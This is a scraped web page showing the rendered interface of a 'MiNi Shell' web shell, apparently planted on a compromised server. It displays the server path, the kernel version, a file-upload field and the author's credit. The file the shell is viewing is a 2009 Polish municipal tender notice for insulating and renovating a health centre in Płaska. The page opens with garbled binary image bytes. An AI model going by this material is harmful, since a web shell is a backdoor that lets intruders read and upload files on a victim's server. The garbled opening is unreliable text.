JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090911/315306-N-2009.html

<p class="kh_header"><b>Płaska: Termomodernizacja budynku ośrodka zdrowia w Płaskiej.</b><br>
<b>Numer ogłoszenia: 315306 - 2009; data zamieszczenia: 11.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Płaska , Płaska 53, 16-326 Płaska, woj. podlaskie, tel. 087 6439080, faks 087 6439081.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.plaska.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynku ośrodka zdrowia w Płaskiej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na: dociepleniu ścian budynku, dociepleniu stropodachu, wymianie stolarki okiennej i drzwiowej, wykonaniu nowych pokryć dachowych i obróbek, remoncie kominów oraz modernizacji instalacji odgromowej i wymianie pieca c.o. 
Szczegółowy opis przedmiotu zamówienia określają:
1)	przedmiar robót budowlanych - termomodernizacja budynku - ocieplenie elewacji i stropodachu,
2)	przedmiar robót budowlanych - wymiana stolarki okiennej i drzwiowej,
3)	przedmiar robót budowlanych - remont stropodachu,
4)	specyfikacja techniczna wykonania i odbioru robót - docieplenie budynku ośrodka zdrowia  w Płaskiej, 
będące integralną częścią specyfikacji istotnych warunków zamówienia.
Termomodernizację budynku należy wykonać na podstawie przedmiarów robót oraz specyfikacji technicznej wykonania i odbioru robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.42.10.00-4, 45.45.30.00-7, 45.26.12.00-6, 45.30.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść wadium zgodnie z art. 45 ust. Prawo zamówień publicznych w wysokości: 5.000,00 zł (słownie zł: pięć tysięcy złotych 00/100).
1.	Wadium wnosi się pod rygorem wykluczenia z postępowania przed upływem terminu składania ofert w jednej lub kilku z niżej wymienionych form:
-  pieniężnej,
-  poręczenia bankowego, 
-  gwarancji bankowej,	
-  gwarancji ubezpieczeniowej,
-  poręczenia udzielanego przez podmioty , o których mowa w art. 6 ust. 3 pkt. 4 lit. b ustawy    z dnia  9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
3.	Wadium wniesione w formie pieniężnej należy wpłacić na rachunek Zamawiającego: 
BS w Bargłowie Kościelnym  nr 06 9334 0001 0000 0056 0546 0001
4.	Wadium wnoszone w innej formie niż pieniężna należy złożyć w Urzędzie Gminy (do oferty nie należy załączać oryginału dokumentu wadialnego, lecz potwierdzenie jego wniesienia do Urzędu).
5.	W przypadku wniesienia wadium w formie gwarancji, z treści dokumentu musi jednoznacznie wynikać, jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska).
Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust 5 ustawy Prawo zamówień publicznych.
6.	W przypadku wnoszenia wadium w formie pieniężnej za termin jego wniesienia zostanie przyjęty termin uznania na rachunku Zamawiającego.
7.	Zamawiający dokona niezwłocznie zwrotu wadium, jeżeli:
1) upłynie termin związania ofertą,
2) zostanie zawarta umowa i wniesione zostanie zabezpieczenie należytego wykonania umowy
3) przetarg zostanie unieważniony a protesty zostaną ostatecznie rozstrzygnięte lub upłynie termin do ich wnoszenia
8.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1) odmówi podpisania umowy na warunkach określonych w ofercie,
2) odmówi wniesienia zabezpieczenia należytego wykonania umowy,
3) zawarcie umowy stanie się niemożliwe z winy Wykonawcy.
9.	W przypadku wycofania oferty przed upływem terminu do jej składania Zamawiający na pisemny wniosek Wykonawcy niezwłocznie zwróci wadium.
10.	W przypadku wykluczenia lub odrzucenia Wykonawcy Zamawiający na pisemny wniosek Wykonawcy niezwłocznie zwróci wadium, jednocześnie tracąc prawo do wniesienia protestu.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Wykonawcy ubiegający się o udzielenie zamówienia muszą spełniać warunki określone w art. 22 ustawy Prawo zamówień publicznych.
2.	Wykonawca musi wykazać, że posiada uprawnienia do wykonania określonej działalności lub czynności - wykonania robót ogólnobudowlanych (PKD 45 - Budownictwo) poprzez złożenie aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej.
3.	Wykonawca udokumentuje, przez złożenie referencji, że wykonał w okresie ostatnich pięciu lat,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, jedną robotę budowlaną tożsamą z przedmiotem niniejszego zamówienia.
4.	Wykonawca musi wykazać, że dysponuje osobami z uprawnieniami budowlanymi do kierowania robotami w specjalności konstrukcyjno-budowlanej, elektrycznej i sanitarnej oraz przedstawić dokumenty potwierdzające, że posiadają odpowiednie uprawnienia budowlane określone przepisami Prawa budowlanego oraz zaświadczenie o przynależności do właściwej izby samorządu zawodowego.

Wykonawcy niespełniający wymaganych warunków zostaną wykluczeni z postępowania,
(art. 24 Ustawy prawo zamówień publicznych).

Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana w systemie spełnia / nie spełnia, na podstawie dokumentów wymienionych w Rozdziale V SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta formalna powinna zawierać następujące dokumenty:

1.	W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Pzp, Wykonawcy obowiązani są złożyć następujące dokumenty:
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie 
do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej (wystawiony nie wcześniej niż 6 m-cy przed upływem terminu składania ofert) - załącznik 1,
b)	aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust.1 pkt. 4-8 ustawy pzp (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert) - załącznik 2,
c)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1  pkt. 9 ustawy p.z.p. (wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert) - załącznik 2a (Uwaga: załącznik dotyczy wyłącznie podmiotów zbiorowych),
d)	zaświadczenie właściwego naczelnika urzędu skarbowego (załącznik 3) oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczania Społecznego (załącznik 4) potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert),
e)	podpisane oświadczenie Wykonawcy, iż Wykonawca nie podlega wykluczeniu z postępowania o zamówienie publiczne na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych (wg wzoru str. 15 SIWZ) - załącznik 5.
W przypadku Wykonawców występujących wspólnie (konsorcjum, spółka cywilna) należy dołączyć aktualne akty rejestracji firmy dla każdego podmiotu.
2.	Podpisane oświadczenie Wykonawcy o spełnieniu warunków określonych w art. 22 ust. 1 pkt. 1-4 ustawy Prawo zamówień publicznych (wg wzoru str. 17 SIWZ) - załącznik 6.
3.	Ogólną informację o firmie (wg wzoru str. 18 SIWZ) - załącznik 7.
4.	W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, Wykonawcy obowiązani są złożyć następujące dokumenty:
a)	wykaz osób (wg wzoru str. 19 SIWZ), które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z danymi na temat ich kwalifikacji niezbędnych do wykonywania zamówienia, a także zakresu wykonywanych przez nich czynności - załącznik 8,
b)	wykaz (wg wzoru str. 20 SIWZ) minimum 3 zrealizowanych w okresie ostatnich pięciu lat robót budowlanych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiących niniejszy przedmiot zamówienia z podaniem ich wartości oraz daty i miejsca wykonania wraz z załączeniem dokumentów, że roboty te zostały wykonane należycie (referencje) - załącznik 9.
W przypadku Wykonawców występujących wspólnie (konsorcjum, spółka cywilna) można wykazać realizacje każdego z podmiotów, które będą oceniane wspólnie.
5.	W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Wykonawcy obowiązani są złożyć następujące dokumenty:
a)	sprawozdanie finansowe oraz opinię o badanym sprawozdaniu wydaną przez biegłego rewidenta (jeżeli podlega ono badaniu zgodnie z przepisami o rachunkowości), a w przypadku wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego, inne dokumenty określające obroty, zysk oraz zobowiązania i należności - za okres ostatnich 3 lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres - załącznik 10,
b)	informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w którym Wykonawca posiada rachunek, potwierdzającą posiadanie środków finansowych lub zdolność kredytową Wykonawcy w wysokości nie niższej niż 200.000,00 PLN, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert - załącznik 11,
c)	polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w ramach prowadzonej działalności, w zakresie dotyczącym przedmiotu zamówienia - załącznik 12.
W przypadku Wykonawców występujących wspólnie (konsorcjum, spółka cywilna) należy dołączyć sprawozdanie dla każdego z podmiotów. 
6. Oświadczenie o spełnieniu warunków, zgodnie z art. 44 ustawy Prawo zamówień publicznych (wg wzoru str. 21 SIWZ) - załącznik 13.
7. Komplet oświadczeń (wg wzoru str. 22 SIWZ) - załączniki 14.
8.	Kosztorys ofertowy przygotowany na podstawie dokumentacji technicznej wskazanej w rozdziale I SIWZ - załącznik 15.
9. Harmonogram realizacji robót - załącznik 16.
10. Akceptacja terminu realizacji zamówienia (wg wzoru str. 23 SIWZ) - załącznik 17.
11. Akceptacja warunków płatności (wg wzoru str. 24 SIWZ) - załącznik 18.
12. Akceptacja istotnych warunków umowy (wg wzoru str. 25 SIWZ) - załącznik 19.
13. Oświadczenie o udzieleniu minimum 3 letniej gwarancji (wg wzoru str. 26 SIWZ) - załącznik 20.
14. Dowód wpłaty wadium - załącznik 21.
15. Dokument pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów złożonych w ofercie, albo do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wymaga się złożenia oryginału stosownego pełnomocnictwa, dopuszcza się również złożenie w ofercie kopii pełnomocnictwa notarialnie potwierdzonej za zgodność z oryginałem lub kopii potwierdzonej przez mocodawcę - załącznik 22.
16. Zestawienie zbiorcze kosztów (wg wzoru str. 27 SIWZ) - załącznik 23..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://ug-plaska.pbip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Płaska, Płaska 53, 16-326 Płaska.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.10.2009 godzina 09:30, miejsce: Urząd Gminy Płaska, 16-326 Płaska 53 - sekretariat, I piętro, pokój nr 1..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com